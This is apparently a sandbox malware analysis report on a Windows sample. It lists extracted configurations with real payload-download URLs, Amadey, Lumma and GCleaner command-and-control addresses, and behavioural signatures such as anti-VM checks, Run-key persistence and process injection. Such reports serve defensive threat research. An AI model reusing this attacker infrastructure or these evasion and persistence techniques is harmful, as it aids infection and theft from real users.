Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
07/04/2025, 15:25
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
d33b9d150e9678bfd2ddbd1b2fbc6c67
-
SHA1
85a6e6b9ec5c2fc066aebd3e054cf6ed3760d6d5
-
SHA256
393c3610f70a0224e1bc4967248032330ac1abc852e35b20ec531aff19d469c2
-
SHA512
ef8086043a3965e8900a773f489b2577ac42fea13d058e0f34c9dd0e76341a1f25cdffaec2462bb84ea30e528dba51ff1b42f44512ee2689fa18cc42e18abac8
-
SSDEEP
24576:jqDEvCTbMWu7rQYlBQcBiT6rprG8a4Su:jTvC/MTQYxsWR7a4S
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://2travelilx.top/GSKAiz
https://jrxsafer.top/shpaoz
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://-furthert.run/azpp
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://ywmedici.top/noagis
https://easyfwdr.digital/azxs
https://jjrxsafer.top/shpaoz
https://upuerrogfh.live/iqwez
https://furthert.run/azpp
https://reformzv.digital/guud
https://apuerrogfh.live/iqwez
https://vquavabvc.top/iuzhd
https://advennture.top/GKsiio
https://0targett.top/dsANGt
https://uywmedici.top/noagis
https://breuhiag.live/uindga
https://krxspint.digital/kendwz
https://rhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://h2advennture.top/GKsiio
https://xrfxcaseq.live/gspaz
https://aywmedici.top/noagis
Extracted
gcleaner
185.156.73.98
45.91.200.135
Signatures
-
Amadey family
-
Asyncrat family
-
Gcleaner family
-
Lumma family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/1408-64-0x0000000000400000-0x000000000073C000-memory.dmp family_stormkitty -
Stormkitty family
-
resource yara_rule behavioral1/memory/1408-64-0x0000000000400000-0x000000000073C000-memory.dmp VenomRAT -
Venomrat family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eb861fdb64.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a6388500fc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bf5d673470.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 16 1828 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1828 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 16 1828 powershell.exe 34 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 67 1728 rapes.exe 99 2280 svchost015.exe 107 3632 svchost015.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bf5d673470.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eb861fdb64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a6388500fc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a6388500fc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bf5d673470.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7baea9db48.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7baea9db48.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eb861fdb64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 3df029ef04.tmp -
Executes dropped EXE 25 IoCs
pid Process 1144 TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE 1728 rapes.exe 5892 v1BRaoR.exe 5280 rapes.exe 4336 Nehh6wZ.exe 3872 31W3sid.exe 4160 NlmvJyQ.exe 4488 eb861fdb64.exe 2280 svchost015.exe 2636 a6388500fc.exe 3632 svchost015.exe 1648 rapes.exe 5280 3df029ef04.exe 2452 3df029ef04.tmp 1920 1b650c32bf.exe 3384 KMSpico.exe 2944 KMSpico.tmp 5072 bf5d673470.exe 4892 core.exe 4400 info.exe 5552 7baea9db48.exe 4432 125bc79e7a.exe 5072 8ef90e3801.exe 1812 4b7069bb00.exe 4020 31W3sid.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine eb861fdb64.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine a6388500fc.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine bf5d673470.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bf5d673470.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494970101\\bf5d673470.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7baea9db48.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494980101\\7baea9db48.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\125bc79e7a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494990101\\125bc79e7a.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000242e4-344.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 1144 TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE 1728 rapes.exe 5280 rapes.exe 4488 eb861fdb64.exe 2636 a6388500fc.exe 1648 rapes.exe 5072 bf5d673470.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 5892 set thread context of 1408 5892 v1BRaoR.exe 111 PID 4336 set thread context of 5684 4336 Nehh6wZ.exe 121 PID 3872 set thread context of 2944 3872 31W3sid.exe 123 PID 4160 set thread context of 2896 4160 NlmvJyQ.exe 125 PID 4488 set thread context of 2280 4488 eb861fdb64.exe 130 PID 2636 set thread context of 3632 2636 a6388500fc.exe 133 PID 1920 set thread context of 4992 1920 1b650c32bf.exe 141 PID 4020 set thread context of 1120 4020 31W3sid.exe 184 -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE File created C:\Windows\Installer\e598b1f.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8C39.tmp msiexec.exe File created C:\Windows\Installer\e598b23.msi msiexec.exe File opened for modification C:\Windows\Installer\e598b1f.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{90C11C8A-AD21-4E7E-BDFA-BD9C724A6087} msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1392 1408 WerFault.exe 111 3476 4992 WerFault.exe 141 -
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KMSpico.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 125bc79e7a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a6388500fc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KMSpico.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 125bc79e7a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ef90e3801.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3df029ef04.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bf5d673470.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language core.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb861fdb64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 125bc79e7a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3df029ef04.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MSBuild.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 97 Go-http-client/1.1 -
Kills process with taskkill 5 IoCs
pid Process 324 taskkill.exe 544 taskkill.exe 1268 taskkill.exe 3176 taskkill.exe 1416 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E msiexec.exe -
Modifies registry class 23 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E\A8C11C0912DAE7E4DBAFDBC927A40678 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678\DefaultFeature msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10495000271\\" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\PackageCode = "CEFEBEF251D3D34458A6CE4F5E1D0E42" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\PackageName = "5809bfa64e.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\ProductName = "BatchInstallerFinal" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\10495000271\\" msiexec.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2308 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 1828 powershell.exe 1828 powershell.exe 1144 TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE 1144 TempKKPH7ERY7XO6JA31UNUTW6GWNHAJEVZB.EXE 1728 rapes.exe 1728 rapes.exe 5280 rapes.exe 5280 rapes.exe 5684 MSBuild.exe 5684 MSBuild.exe 5684 MSBuild.exe 5684 MSBuild.exe 2896 MSBuild.exe 2896 MSBuild.exe 2896 MSBuild.exe 2896 MSBuild.exe 4488 eb861fdb64.exe 4488 eb861fdb64.exe 2636 a6388500fc.exe 2636 a6388500fc.exe 1648 rapes.exe 1648 rapes.exe 2452 3df029ef04.tmp 2452 3df029ef04.tmp 5072 bf5d673470.exe 5072 bf5d673470.exe 5072 bf5d673470.exe 5072 bf5d673470.exe 5072 bf5d673470.exe 5072 bf5d673470.exe 4892 core.exe 4892 core.exe 4892 core.exe 4892 core.exe 4892 core.exe 4892 core.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 1828 msiexec.exe 1828 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 1408 MSBuild.exe Token: SeIncreaseQuotaPrivilege 1408 MSBuild.exe Token: SeSecurityPrivilege 1408 MSBuild.exe Token: SeTakeOwnershipPrivilege 1408 MSBuild.exe Token: SeLoadDriverPrivilege 1408 MSBuild.exe Token: SeSystemProfilePrivilege 1408 MSBuild.exe Token: SeSystemtimePrivilege 1408 MSBuild.exe Token: SeProfSingleProcessPrivilege 1408 MSBuild.exe Token: SeIncBasePriorityPrivilege 1408 MSBuild.exe Token: SeCreatePagefilePrivilege 1408 MSBuild.exe Token: SeBackupPrivilege 1408 MSBuild.exe Token: SeRestorePrivilege 1408 MSBuild.exe Token: SeShutdownPrivilege 1408 MSBuild.exe Token: SeDebugPrivilege 1408 MSBuild.exe Token: SeSystemEnvironmentPrivilege 1408 MSBuild.exe Token: SeRemoteShutdownPrivilege 1408 MSBuild.exe Token: SeUndockPrivilege 1408 MSBuild.exe Token: SeManageVolumePrivilege 1408 MSBuild.exe Token: 33 1408 MSBuild.exe Token: 34 1408 MSBuild.exe Token: 35 1408 MSBuild.exe Token: 36 1408 MSBuild.exe Token: SeIncreaseQuotaPrivilege 1408 MSBuild.exe Token: SeSecurityPrivilege 1408 MSBuild.exe Token: SeTakeOwnershipPrivilege 1408 MSBuild.exe Token: SeLoadDriverPrivilege 1408 MSBuild.exe Token: SeSystemProfilePrivilege 1408 MSBuild.exe Token: SeSystemtimePrivilege 1408 MSBuild.exe Token: SeProfSingleProcessPrivilege 1408 MSBuild.exe Token: SeIncBasePriorityPrivilege 1408 MSBuild.exe Token: SeCreatePagefilePrivilege 1408 MSBuild.exe Token: SeBackupPrivilege 1408 MSBuild.exe Token: SeRestorePrivilege 1408 MSBuild.exe Token: SeShutdownPrivilege 1408 MSBuild.exe Token: SeDebugPrivilege 1408 MSBuild.exe Token: SeSystemEnvironmentPrivilege 1408 MSBuild.exe Token: SeRemoteShutdownPrivilege 1408 MSBuild.exe Token: SeUndockPrivilege 1408 MSBuild.exe Token: SeManageVolumePrivilege 1408 MSBuild.exe Token: 33 1408 MSBuild.exe Token: 34 1408 MSBuild.exe Token: 35 1408 MSBuild.exe Token: 36 1408 MSBuild.exe Token: SeDebugPrivilege 544 taskkill.exe Token: SeDebugPrivilege 1268 taskkill.exe Token: SeDebugPrivilege 3176 taskkill.exe Token: SeDebugPrivilege 1416 taskkill.exe Token: SeDebugPrivilege 324 taskkill.exe Token: SeDebugPrivilege 3820 firefox.exe Token: SeDebugPrivilege 3820 firefox.exe Token: SeShutdownPrivilege 2192 msiexec.exe Token: SeIncreaseQuotaPrivilege 2192 msiexec.exe Token: SeSecurityPrivilege 1828 msiexec.exe Token: SeCreateTokenPrivilege 2192 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2192 msiexec.exe Token: SeLockMemoryPrivilege 2192 msiexec.exe Token: SeIncreaseQuotaPrivilege 2192 msiexec.exe Token: SeMachineAccountPrivilege 2192 msiexec.exe Token: SeTcbPrivilege 2192 msiexec.exe Token: SeSecurityPrivilege 2192 msiexec.exe Token: SeTakeOwnershipPrivilege 2192 msiexec.exe Token: SeLoadDriverPrivilege 2192 msiexec.exe Token: SeSystemProfilePrivilege 2192 msiexec.exe -
Suspicious use of FindShellTrayWindow 32 IoCs
pid Process 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4580 2025-04-07_d33b9d150e9678bfd2ddbd1b2fbc6c67_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2452 3df029ef04.tmp 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 4432 125bc79e7a.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 3820 firefox.exe 4432 125bc79e7a.exe 4432 125bc79e7a.exe 3820 firefox.exe 4432 125bc79e7a.exe -
Suspicious use of SendNotifyMessage 25 IoCs
